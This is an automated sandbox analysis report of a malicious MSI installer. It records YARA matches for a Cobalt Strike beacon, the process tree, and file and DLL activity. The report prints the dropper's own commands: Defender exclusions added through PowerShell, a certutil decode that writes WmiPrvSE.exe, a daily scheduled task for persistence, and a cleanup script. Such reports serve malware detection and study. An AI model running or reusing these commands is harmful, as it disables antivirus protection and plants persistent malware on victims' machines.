Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winMSI@37/69@0/1

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000876D0 FormatMessageW,GetLastError,

4_2_000876D0

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_00770B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

23_2_00770B70

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000A5D40 GetDiskFreeSpaceExW,

4_2_000A5D40

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_00773A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,

23_2_00773A64

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000AEAE0 CoCreateInstance,

4_2_000AEAE0

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_00080A00 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

4_2_00080A00

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\WmiPrvSE

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\WmiPrvSE

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF01E9F0DB4122B155.TMP

Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

File read: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Key opened: HKEY_USERSS-1-5-18\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1eSOBjseu2.msi	Virustotal: Detection: 32%
Source: 1eSOBjseu2.msi	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1eSOBjseu2.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe"
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\WmiPrvSE.exe C:\Users\Public\WmiPrvSE.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\WmiPrvSE.exe C:\Users\Public\WmiPrvSE.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
